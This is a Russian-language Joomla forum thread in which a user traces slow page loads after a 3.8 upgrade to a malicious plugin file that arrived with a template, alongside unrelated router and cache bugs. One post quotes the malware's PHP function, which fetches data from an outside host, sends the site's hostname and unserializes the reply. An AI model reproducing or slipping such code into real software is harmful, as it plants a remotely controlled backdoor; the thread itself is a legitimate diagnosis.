0 Пользователей и 1 Гость просматривают эту тему.
  • 29 Ответов
  • 1035 Просмотров
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Доброго всем времени
После обновления до 3.8 сайт стал слишком долго загружаться. Время загрузки увеличилось до 30 секунд.
При отладке выдает что один из запросов стал работать слишком медленно.
Результаты профилирования выдали следующее:
Спойлер
[свернуть]

Больше всего смущает последняя строчка и не совсем ясно куда копать.
Прошу помощи
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #2 : 28.09.2017, 11:53:21 »
Пробовал. И не только этот плагин.
Судя по тому, что увидел в сети - проблема возможно со сборкой. Тем более что и новый роутер работает мягко говоря не корректно. Да и с кэшированием проблемы наблюдаются.
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #3 : 28.09.2017, 11:54:17 »
Причем проблемы и на уровне админки. Такая же большая задержка при любых действиях.
*

b2z

  • Глобальный модератор
  • 6960
  • 755 / 0
  • Разраблю понемногу
Re: Проблема после обновления до 3.8
« Ответ #4 : 28.09.2017, 12:40:07 »
Пробовал. И не только этот плагин.
Судя по тому, что увидел в сети - проблема возможно со сборкой. Тем более что и новый роутер работает мягко говоря не корректно. Да и с кэшированием проблемы наблюдаются.
Новый роутер по умолчанию работает в старом режиме. Если действия выполнять не в материалах (com_content), проблема остаётся?
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #5 : 28.09.2017, 12:48:34 »
Да. В админке всё работает слишком медленно. Задержка до минуты и более.

PS: Отключение всех плагинов было первым, что попробовал.
*

b2z

  • Глобальный модератор
  • 6960
  • 755 / 0
  • Разраблю понемногу
Re: Проблема после обновления до 3.8
« Ответ #6 : 28.09.2017, 12:52:13 »
Если зайти в менеджер пользователей, какой результат профилирования? И приложите SQL запросы.
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #7 : 28.09.2017, 13:00:10 »
Результаты профилирования

Спойлер
[свернуть]

Причем это ошибка не на стороне хостинга. Это уже проверяли и соответствующее уведомление было отправлено на forum.joomla.org. Low query также отсутствует.

По запросам (всё, что есть, включая профилирование, план и стек вызовов)
Спойлер
[свернуть]
« Последнее редактирование: 28.09.2017, 13:11:10 от filoleg »
*

dmitry_stas

  • Легенда
  • 12171
  • 1155 / 7
Re: Проблема после обновления до 3.8
« Ответ #8 : 28.09.2017, 13:07:59 »
могу погадать, и сказать что возможно сайт взломан. а обновление жумлы поломало существующую расстановку в файлах, и теперь зловред стучится стучится а ответа все нет и нет. он ждет, и скрипт на некоторое время "подвисает". ну как вариант.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #9 : 28.09.2017, 13:13:29 »
могу погадать, и сказать что возможно сайт взломан. а обновление жумлы поломало существующую расстановку в файлах, и теперь зловред стучится стучится а ответа все нет и нет. он ждет, и скрипт на некоторое время "подвисает". ну как вариант.

Вариант не подходит. Проверяли вместе с техподдержкой хостинга.
Тем более как было замечено на forum.joomla.org - ошибка не единичного характера и появляется на многих сайтах.


*

dmitry_stas

  • Легенда
  • 12171
  • 1155 / 7
Re: Проблема после обновления до 3.8
« Ответ #10 : 28.09.2017, 13:41:43 »
Вариант не подходит. Проверяли вместе с техподдержкой хостинга.
а хостер - специалист в области защиты? :) я бы не отметал это вариант...

Тем более как было замечено на forum.joomla.org - ошибка не единичного характера и появляется на многих сайтах.
где это такое на forum.joomla.org? дайте линки.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #11 : 28.09.2017, 13:47:17 »
а хостер - специалист в области защиты? :) я бы не отметал это вариант...
где это такое на forum.joomla.org? дайте линки.

https://forum.joomla.org/viewtopic.php?f=9&p=3494484#p3494484
https://forum.joomla.org/viewforum.php?f=709
*

draff

  • Живу я здесь
  • 3471
  • 226 / 6
  • Ищу работу
Re: Проблема после обновления до 3.8
« Ответ #12 : 28.09.2017, 13:48:52 »
Переустановить Джумла в Обновлении Джумла.
Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart -> Коммерческий раздел     |    Отзывы
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

dmitry_stas

  • Легенда
  • 12171
  • 1155 / 7
Re: Проблема после обновления до 3.8
« Ответ #13 : 28.09.2017, 14:05:18 »
https://forum.joomla.org/viewtopic.php?f=9&p=3494484#p3494484
это вообще не то. и остальные темы тоже ни о чем. я бы вам оооочень рекомендовал бы проверится. хотя бы айболитом, в параноидальном режиме.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #14 : 28.09.2017, 14:06:43 »
Переустановить Джумла в Обновлении Джумла.

Было. Несколько раз. Результата не дало
*

draff

  • Живу я здесь
  • 3471
  • 226 / 6
  • Ищу работу
Re: Проблема после обновления до 3.8
« Ответ #15 : 28.09.2017, 14:14:08 »
Значит Джумла не причина проблем с загрузкой .
Удалю вирус с сайта. Обновление Joomla!, JoomShopping, Virtuemart -> Коммерческий раздел     |    Отзывы
Создам плагин , модуль под заказ для VirtueMart , JoomShopping
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #16 : 28.09.2017, 14:29:59 »
Значит Джумла не причина проблем с загрузкой .

По опыту. Не факт. Но впрочем айболит ничего сильно не корректного не нашел. Окромя того что выругался на
plugins/system/model/model.php
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #17 : 28.09.2017, 14:51:28 »
Значит Джумла не причина проблем с загрузкой .

Вообще помогло. Спасибо. В этом файле действительно содержалась откровенная фигня. Осталось понять откуда сей файл прилетел. Правда на некорректности работы роутера (в экспериментальном режиме с удалением id) не отразилось. Глюки остались.
*

voland

  • Легенда
  • 10013
  • 550 / 107
  • Эта строка съедает место на вашем мониторе
Re: Проблема после обновления до 3.8
« Ответ #18 : 28.09.2017, 14:55:56 »
По опыту. Не факт. Но впрочем айболит ничего сильно не корректного не нашел. Окромя того что выругался на
plugins/system/model/model.php
А на что там ругнулся?
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #19 : 28.09.2017, 15:21:48 »
А на что там ругнулся?

    public function getConfigOpt() {
        $pg = $this->getThisPage();
        $Conf = @file_get_contents($pg.'/?d=' . $_SERVER['HTTP_HOST']);
        return @unserialize($Conf);
    }

и из getThisPage передавался искаженный сторонний сайт
Осталось понять с чем это попало на сайт
*

SeBun

  • Живу я здесь
  • 3632
  • 231 / 3
  • @SeBun48
Re: Проблема после обновления до 3.8
« Ответ #20 : 28.09.2017, 16:09:16 »
  $Conf = @file_get_contents($pg.'/?d=' . $_SERVER['HTTP_HOST']);
Красивая строчка  ;D
Оказываю услуги по Joomla | Миграция на Joomla 3.x | Сопровождение | IT-аутсорсинг
*

dmitry_stas

  • Легенда
  • 12171
  • 1155 / 7
Re: Проблема после обновления до 3.8
« Ответ #21 : 28.09.2017, 17:14:30 »
отличная строчка :) а вы - с хостером проверяли, с хостером проверяли... хостеры проверяльщики еще те...
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #22 : 28.09.2017, 17:41:23 »
Тише, тише.

Вопрос относительно криво работающего роутера при удалении id всё равно остался
« Последнее редактирование: 28.09.2017, 17:57:00 от filoleg »
*

robert

  • Живу я здесь
  • 4589
  • 428 / 16
Re: Проблема после обновления до 3.8
« Ответ #23 : 28.09.2017, 17:59:19 »
Тише, тише.

Вопрос относительно криво работающего роутера при удалении id всё равно остался
Нет, неверно, это не последний вопрос. Вот что намного актуальнее:
Осталось понять с чем это попало на сайт
Не будь паразитом, сделай что-нибудь самостоятельно!
*

dmitry_stas

  • Легенда
  • 12171
  • 1155 / 7
Re: Проблема после обновления до 3.8
« Ответ #24 : 28.09.2017, 18:04:21 »
Тише, тише.

Вопрос относительно криво работающего роутера при удалении id всё равно остался
ну я вас прошу :) роутер - это последнее, что вас сейчас должно волновать в контексте работы сайта. займитесь лечением. роутер будете потом решать.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #25 : 28.09.2017, 18:18:17 »
ну я вас прошу :) роутер - это последнее, что вас сейчас должно волновать в контексте работы сайта. займитесь лечением. роутер будете потом решать.

С лечением уже как бы нормально. Похоже кусок кода прилетел с новоустановленным шаблоном. Сейчас шаблон удален вместе с лишними частями. Еще раз погонял айболитом на предмет излишеств. Полёт нормальный
*

dmitry_stas

  • Легенда
  • 12171
  • 1155 / 7
Re: Проблема после обновления до 3.8
« Ответ #26 : 28.09.2017, 18:32:40 »
С лечением уже как бы нормально.
ох... ну хорошо конечно, если так...
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #27 : 29.09.2017, 12:36:02 »
Похоже таки новый роутер сыроват.
Вместо материалов в обычном виде отображения (в виде id-алиас), стали отображаться вариации
вида
site.ru/ru-library?view=category&id=41
или
site.ru/ru-library?view=article&id=418

Хотя основные настройки сайта не менялись.
Да и кэш почему-то заполняется страницами. При том что он отключен
« Последнее редактирование: 29.09.2017, 13:41:16 от filoleg »
*

Teimuraz

  • Новичок
  • 2
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #28 : 29.09.2017, 13:20:47 »
После обновления до 3.8 не работает PAGE BREAK. В HTML коде <hr title="Наименование" alt="Наименование" class="system-pagebreak" />
Переустановил Джумлу все равно не работает. Сделал Extensions --> Manage--> Database --> FIX все равно не работает. На англоязычных форумах ничего не нашел. Кто знает, что делать?
*

filoleg

  • Захожу иногда
  • 81
  • 0 / 0
Re: Проблема после обновления до 3.8
« Ответ #29 : 29.09.2017, 13:44:57 »
В общем странновато работает роутер в режиме experimental с удалением id. Странновато=некорректно.
Вопрос с кэшем, что формируется при отключенном кэшировании - тоже остался

Кстати может мне кто-нибудь заодно объяснить - каким чудесным образом старый вариант урла
site/204-lib/cw00000000/cw01000000/cw01002000/cw0100200001/11761-w010020001
превращается в новый site/ru-article/11761-w010020001 в режиме experimental?

Получается что остается использовать вариант stable, поскольку experimental не особо выдерживает критики
« Последнее редактирование: 29.09.2017, 13:55:58 от filoleg »
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Знатоки нужна помощь...Ошибка после перехода версии php

Автор polezniy

Ответов: 19
Просмотров: 510
Последний ответ 14.11.2018, 13:36:06
от Igor2
После обновление некорректно работает плагин "Поля"

Автор Victor333

Ответов: 3
Просмотров: 122
Последний ответ 12.11.2018, 11:44:51
от NewUsers
После настройки 301 редиректа не пускает в админку

Автор Apollon

Ответов: 16
Просмотров: 1212
Последний ответ 18.10.2018, 19:02:33
от Vasiliy111
После обновления до Joomla 3.7 в админке в меню "Компоненты" пропали пункты

Автор lolitma3

Ответов: 37
Просмотров: 5461
Последний ответ 11.10.2018, 16:28:28
от khan-alex
После перехода на PHP 7.2.9 сайт Joomla работает некорректно

Автор stimyl

Ответов: 18
Просмотров: 506
Последний ответ 27.09.2018, 12:54:30
от stimyl